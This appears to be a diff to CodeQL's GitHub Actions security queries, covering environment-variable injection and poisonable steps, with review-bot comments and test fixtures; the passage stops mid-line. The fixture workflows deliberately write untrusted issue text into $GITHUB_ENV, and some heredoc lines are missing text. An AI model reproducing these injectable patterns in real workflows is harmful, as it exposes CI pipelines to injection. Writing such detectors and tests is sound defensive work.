@@ -258,17 +215,18 @@ class GitHubEventJsonSource extends RemoteFlowSource { this.asExpr() = e and context = e.getExpression() and ( - jsonEvent(context) and - ( - exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") - ) - or - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") - ) + // only contexts for the triggering events are considered tainted. + // eg: for `pull_request`, we only consider `github.event.pull_request` + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + or + // github.event is taintes for all triggers + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") ) and flag = "json" ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bbc40d56e2b..4f4d80cc11b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
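Review bot: The pattern passed in `wrapJsonRegexp("\\bgithub.event\\b")` leaves the dot unescaped, so it matches any character between `github` and `event`, unlike every entry in `jsonEvent()`, which escapes it. I would write `normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("github\\.event") + ".*")`; the `\\b` anchors are unnecessary between `\\s*` and the literal. The added comment reads `github.event is taintes for all triggers`; it should read `tainted`.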
@@ -32,15 +32,20 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - ( - writeToGitHubEnv(run, _, value) or - writeToGitHubOutput(run, _, value) or - writeToGitHubPath(run, value) - ) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + exists(Run run, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() + | + ( + writeToGitHubEnv(run, content) or + writeToGitHubOutput(run, content) + ) and + extractVariableAndValue(content, _, value) and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + writeToGitHubPath(run, content) and + value = content and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } 
@@ -55,25 +60,28 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=foo::$BODY" * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and succ.asExpr() = run and - writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - writeToGitHubEnv(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + isBashParameterExpansion(value, var_name, _, _) ) } @@ -83,25 +91,27 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * - run: echo "::set-output name=id::$( 0 + value.matches("$(echo %") and value.indexOf(var_name) > 0 ) ) } 
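Review bot: `envToEnvStoreStep` now requires `isBashParameterExpansion(value, var_name, _, _)`, while `envToOutputStoreStep` in the same hunk and `envToRunStep` in the preceding hunk keep the substring test `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")`. Because `isBashParameterExpansion` is built on `regexpCapture`, which has to match the whole string, a value such as `$(echo $BODY)` or `prefix-$BODY` would no longer store taint on the job, although the `envToRunStep` comment lists `echo "foo=$(echo $BODY)" >> $GITHUB_ENV` as a supported form. If only bare expansions are meant to propagate here, add a comment saying so; otherwise keep `value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")` for this predicate too.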
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 12919004c03..ead69480d8a 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,21 +9,23 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string varname, string key, string value | - expr = run.getInScopeEnvVarExpr(varname) and - writeToGitHubEnv(run, key, value) and + exists(Run run, Expression expr, string var_name, string content, string value | + expr = run.getInScopeEnvVarExpr(var_name) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } } class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 646dc35d1f4..3349b5b1121 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
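Review bot: `EnvVarInjectionFromFileReadSink` still uses the `value.regexpMatch(...)` that recognises only `cat` and `<` and has to match the entire value, whereas `EnvVarInjectionRunStep` in PoisonableSteps.qll, changed in this same commit, now looks for `ls `, `cat `, `jq ` and `$(<` anywhere in the value. A step that reads the artifact with `jq`, or that puts a literal prefix before the command substitution, is therefore a poisonable step but not a sink. I would move the file-read heuristic into one shared predicate in Helper.qll and call it from both places, which also resolves the `TODO` kept in this hunk. The class body closes outside the hunk.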
@@ -5,7 +5,10 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] + [ + "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", + "ruby/setup-ruby", "actions/jekyll-build-pages" + ] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { @@ -70,14 +73,14 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { - exists(string value | + exists(string content, string value | // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + writeToGitHubEnv(this, content) and + extractVariableAndValue(content, _, value) and + value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") ) } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml index a112d4ee0f4..dafcd56bba9 100644 --- a/ql/test/library-tests/.github/workflows/multiline.yml +++ b/ql/test/library-tests/.github/workflows/multiline.yml 
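Review bot: In `EnvVarInjectionRunStep` the new test `value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%")` no longer requires the command to sit inside a command substitution. Any value that merely contains the text `cat ` or `ls ` (constructed examples: `concat $A`, `tools $B`) now marks the step as poisonable, which the removed regex avoided by anchoring on `$(` or a backtick. I would keep that anchor while allowing surrounding text, e.g. `value.regexpMatch(".*\\$\\(\\s*(ls|cat|jq)\\s.*") or value.matches("%$(<%")`, with a matching alternative for the backtick form. The `// Heuristic:` comment above should also list `ls` and `jq` with an example each, since the dropped TODO was the only hint that more commands were intended.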
@@ -31,3 +31,59 @@ jobs: cat <<-"EOF" > event.json ${{ toJson(github.event) }} EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 20db431fc24..18f72de36d1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -4,18 +4,18 @@ files | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -30,7 +30,17 @@ steps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -48,7 +58,17 @@ runSteps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -64,7 +84,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
@@ -89,7 +109,27 @@ runStepChildren | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| 
.github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -141,37 +181,107 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | 
.github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho 
"status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| 
.github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> 